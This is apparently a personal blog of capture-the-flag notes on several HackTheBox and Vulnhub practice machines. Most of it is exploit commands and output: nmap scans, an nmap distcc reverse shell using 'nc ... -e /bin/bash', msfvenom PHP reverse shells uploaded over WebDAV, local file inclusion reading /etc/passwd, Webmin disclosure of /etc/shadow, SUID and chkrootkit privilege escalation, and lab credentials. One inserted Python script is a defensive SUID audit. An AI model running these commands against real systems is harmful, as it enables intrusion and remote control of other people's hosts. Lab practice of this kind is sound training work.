bl0g
yet another blog
Monday, March 30, 2020
Wednesday, October 16, 2019
HackTheBox: Legacy
source: https://www.hackthebox.eu/home/machines/profile/2
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
smb-vuln-cve2009-3103
smb-vuln-ms08-067
smb-vuln-ms17-010
ms08-067
TODO: but actually I cannot get a reverse shell without the help of Metasploit exploits
ms17-010 download nc.exe via FTP, then get reverse shell
HackTheBox: Lame
source: https://www.hackthebox.eu/home/machines/profile/1
my ip: 10.10.14.2
10.10.10.3
10.10.10.3
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Samba 3.0.20-Debian
https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687
uid=1(daemon) gid=1(daemon) groups=1(daemon)
reverse shell:
nmap -n -v -p3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc 10.10.14.2 443 -e /bin/bash'"
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 8.04"
makis:x:1003:1003::/home/makis:/bin/sh
find / -perm -u=s 2>/dev/null
nmap --interactive
!sh
Vulnhub: pWnOS: 2.0 (Pre-Release)
source: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
change to dhcp:
init=/bin/bash
mount -o remount,rw /
vim /etc/network/interfaces
then reboot
192.168.1.8
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
maybe ubuntu 12.04
/info/
/info.php
/login/
/register
/activate
/blog
/includes
PHP Version 5.3.5-1ubuntu7
http://192.168.1.8/blog/
https://www.exploit-db.com/exploits/1191
Simple PHP Blog 0.4.0 - Multiple Remote s
perl ./1191.pl -h http://192.168.1.8/blog -e 1
perl ./1191.pl -h http://192.168.1.8/blog -e 3 -U foo -P bar
http://192.168.1.8/blog/images/cmd.php?cmd=id
reverse shell:
login, upload rs.php
http://192.168.1.8/blog/images/rs.php
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 11.04"
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
cat /var/www/mysqli_connect.php
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
mysql -uroot -pgoodday -e "SHOW DATABASES"
ERROR 1045
https://www.exploit-db.com/exploits/40839
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Vulnhub: pWnOS: 1.0
source: https://www.vulnhub.com/entry/pwnos-10,33/
192.168.1.6
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
maybe ubuntu 7.10
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/index2 (Status: 200)
/index1 (Status: 200)
/index2.php (Status: 200)
/index.php (Status: 200)
/php (Status: 301)
local file inclusion:
http://192.168.1.6/index1.php?help=false&connect=../../../../etc/passwd
samba 3.0.26a
https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
perl ./2017.pl 192.168.1.6 10000 /etc/issue 0
perl ./2017.pl 192.168.1.6 10000 /etc/passwd 0
perl ./2017.pl 192.168.1.6 10000 /etc/shadow 0
perl ./2017.pl 192.168.1.6 10000 /home/obama/.ssh/authorized_keys 0
https://github.com/g0tmi1k/debian-ssh
ssh -i ./common_keys/rsa/2048/dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.1.6
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 7.10"
https://www.exploit-db.com/exploits/8478
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation
Vulnhub: SickOs: 1.2
source: https://www.vulnhub.com/entry/sickos-12,144/
192.168.1.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28
maybe ubuntu 11.10/12.04
/index.php
/test/
/~sys~
curl -v -o /dev/null -s -XOPTIONS http://192.168.1.5/test/
MS-Author-Via: DAV
reverse shell:
msfvenom -p php/reverse_php LHOST=192.168.1.90 LPORT=443 -f raw > rs.php
nmap -p 80 192.168.1.5 --script http-put --script-args http-put.url='/test/rs.php',http-put.file='./rs.php'
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash
https://www.exploit-db.com/exploits/33899
Chkrootkit 0.49 - Local Privilege Escalation
echo "chmod +s /bin/bash" > /tmp/update
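Defender-side counterpart to the SUID tricks in these notes (the `find / -perm -u=s` search on Lame and the `chmod +s /bin/bash` drop-in for the chkrootkit bug above): keep a baseline of the set-id binaries a host is supposed to have and alert on anything new. This is an added example, not part of the original notes or of any of the boxes; the baseline paths and the sample listing are constructed for illustration.

```python
"""Audit SUID/SGID binaries against a known-good baseline.

Added example, not from the original notes. BASELINE and SAMPLE_LISTING
are constructed values standing in for a real allow-list and a real scan.
"""
import os
import stat
from typing import Iterable, List, Tuple

# Constructed baseline: set-id binaries a minimal Ubuntu-like host is expected to have.
BASELINE = frozenset({
    "/bin/su",
    "/usr/bin/passwd",
    "/usr/bin/sudo",
})


def is_setid(mode: int) -> bool:
    """True if the mode bits carry SUID or SGID (what `chmod +s` sets)."""
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))


def unexpected_setid(entries: Iterable[Tuple[str, int]], baseline=BASELINE) -> List[str]:
    """Return paths of regular files with SUID/SGID set that are not in the baseline.

    SGID directories (e.g. /var/mail) are normal and are skipped.
    """
    found = []
    for path, mode in entries:
        if not stat.S_ISREG(mode):
            continue
        if is_setid(mode) and path not in baseline:
            found.append(path)
    return sorted(found)


def scan_filesystem(root: str = "/") -> List[Tuple[str, int]]:
    """Walk the real filesystem and collect (path, st_mode) pairs without following symlinks."""
    skip = {"/proc", "/sys", "/dev", "/run"}
    result = []
    for dirpath, dirnames, filenames in os.walk(root):
        # prune pseudo filesystems so the walk stays on real files
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry; not a finding
            result.append((path, st.st_mode))
    return result


# Constructed sample listing standing in for a scan result; /bin/bash has had
# `chmod +s` applied, which is the persistence the chkrootkit trick leaves behind.
SAMPLE_LISTING = [
    ("/bin/su",         stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/usr/bin/passwd", stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/usr/bin/sudo",   stat.S_IFREG | stat.S_ISUID | 0o755),
    ("/bin/bash",       stat.S_IFREG | stat.S_ISUID | stat.S_ISGID | 0o755),
    ("/bin/ls",         stat.S_IFREG | 0o755),
    ("/var/mail",       stat.S_IFDIR | stat.S_ISGID | 0o775),
]

if __name__ == "__main__":
    # Swap SAMPLE_LISTING for scan_filesystem() to audit the local host.
    for path in unexpected_setid(SAMPLE_LISTING):
        print("unexpected set-id binary:", path)
```

Running it as-is reports only /bin/bash; pointing `unexpected_setid` at `scan_filesystem()` and a baseline captured from a freshly built host turns the same logic into a periodic integrity check.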
Tuesday, October 15, 2019
Vulnhub: SickOs: 1.1
source: https://www.vulnhub.com/entry/sickos-11,132/
192.168.1.107
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
maybe ubuntu 11.10/12.04
gobuster dir -p http://192.168.1.107:3128 -u http://192.168.1.107 -w /usr/share/seclists/Discovery/Web-Content/common.txt
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/connect (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
curl --proxy http://192.168.1.107:3128 http://192.168.1.107/robots.txt
Dissalow: /wolfcms
http://192.168.1.107/wolfcms/docs/updating.txt
v0.8.2
https://github.com/wolfcms/wolfcms/tree/0.8.2/wolf
http://192.168.1.107/wolfcms/?/admin/login
username admin, password admin
reverse shell:
upload rs.php
http://192.168.1.107/wolfcms/public/rs.php
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
cat /var/www/wolfcms/config.php
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
ssh username sickos, password john@123